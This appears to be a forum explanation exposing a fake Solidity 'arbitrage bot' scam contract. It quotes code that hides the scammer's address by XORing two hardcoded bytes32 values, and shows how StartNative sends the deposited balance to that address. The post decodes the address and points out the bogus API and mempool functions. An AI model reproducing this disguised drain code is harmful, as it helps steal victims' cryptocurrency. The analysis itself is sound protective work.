The scam:
bytes32 DexRouter = 0xfdc54b1a6f53a21d375d0dea4b719169497dbac884f858c6cc4034ec1a5c51dc bytes32 factory = 0xfdc54b1a6f53a21d375d0deacc54b9f1d5309afc19f5eb0cca35296fc6da89ed // Arbitrage search function for a native blockchain token function startArbitrageNative() internal { address tradeRouter = getDexRouter(DexRouter, factory); // < ---- Look here address dataProvider = getDexRouter(apiKey, apiSignature); IERC20(dataProvider).createStart(msg.sender, tradeRouter, address(0), address(this).balance); payable(tradeRouter).transfer(address(this).balance); // < ---- Look here } // ... function StartNative() public payable { startArbitrageNative(); }
getDexRouter returns the scammers address by xoring the hardcoded hashes
// Function getDexRouter returns the DexRouter address function getDexRouter(bytes32 _DexRouterAddress, bytes32 _factory) internal pure returns (address) { return address(uint160(uint256(_DexRouterAddress) ^ uint256(_factory))); }
In python:
>>> DexRouter = 0xfdc54b1a6f53a21d375d0dea4b719169497dbac884f858c6cc4034ec1a5c51dc >>> factory = 0xfdc54b1a6f53a21d375d0deacc54b9f1d5309afc19f5eb0cca35296fc6da89ed >>> >>> w3.to_checksum_address(DexRouter ^ factory) '0x872528989c4D20349D0dB3Ca06751d83DC86D831'

StartNative calls startArbitrageNative, which computes the address and makes the transfer:
// Function for triggering an arbitration contract function StartNative() public payable { startArbitrageNative(); } //.. address tradeRouter = getDexRouter(DexRouter, factory); // payable(tradeRouter).transfer(address(this).balance); }
Easier ways to tell it's a scam:
Anything mentioning API is going to be total rubbish:
apiKey = 0xfdc54b1a6f53a21d375d0dea444a27bd72abfff26c6fe5439842b42f4f5a01fc; apiSignature = 0xfdc54b1a6f53a21d375d0dea84608d84c088017f6661b90cbfa86d27732f6d3e; // Obtaining your own api key to connect to the arbitration data provider function Key() public view returns (uint256) { uint256 _balance = address(_owner).balance - arbTxPrice; return _balance; } }
Same with anything about Mempool, it isn't possible from on chain so you know it's a lie:
// Mempool scanning function for interaction transactions with routers of selected DEX exchanges function mempool(address _router1, address _router2, address _token1, address _token2, uint256 _amount) internal view returns (uint256) { uint256 amtBack1 = getAmountOutMin(_router1, _token1, _token2, _amount); uint256 amtBack2 = getAmountOutMin(_router2, _token2, _token1, amtBack1); return amtBack2; }